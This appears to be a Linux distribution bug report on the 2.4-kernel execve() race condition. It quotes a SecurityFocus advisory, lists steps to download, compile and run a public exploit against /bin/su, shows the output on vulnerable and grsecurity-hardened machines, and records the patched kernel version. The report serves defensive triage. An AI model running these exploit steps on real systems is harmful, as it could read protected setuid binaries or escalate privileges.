Quote from http://www.securityfocus.com/bid/8042/discussion/
----------------
A race condition vulnerability has been discovered in the Linux execve() system call, affecting the 2.4 kernel tree. The problem lies in the atomicity of placing a target executable's file descriptor within the current process descriptor and executing the file. An attacker could potentially exploit this vulnerability to gain read access to a setuid binary that would otherwise be unreadable. Although unconfirmed, it may also be possible for an attacker to write code to a target executable, making it theoretically possible to execute arbitrary code with elevated privileges.
----------------

exploit: http://www.securityfocus.com/data/vulnerabilities/exploits/suiddmp.c

I have tested the exploit on 3 different machines, but only 1 was vulnerable. I think the reason is that two of them have grsecurity enabled, and the other doesn't.

Reproducible: Always

Steps to Reproduce:
1. wget http://www.securityfocus.com/data/vulnerabilities/exploits/suiddmp.c
2. cc -o suiddmp suiddmp.c
3. ./suiddmp /bin/su

Actual Results:
Output from the one without grsecurity:
----------------
lamb@alunos lamb $ ./suiddmp /bin/su
Parent running pid 7341
Child running pid 7342
Parent stat loop
Parent success stating: uid 0 gid 0 mode 104755 inode 609245 size 23324
lamb@alunos lamb $ Password:
su: Authentication failure
Sorry.
----------------

and the other two with grsecurity enabled:
----------------
pt_lamb@mestserv01 pt_lamb $ ./suiddmp /bin/su
Parent running pid 10192
Parent stat loop
Child running pid 7777
opened wrong file!: Bad file descriptor
pt_lamb@mestserv01 pt_lamb $ Password:
su: Authentication failure
Sorry.
----------------
patches in gentoo-sources-2.4.20-r6
changing resolution to FIXED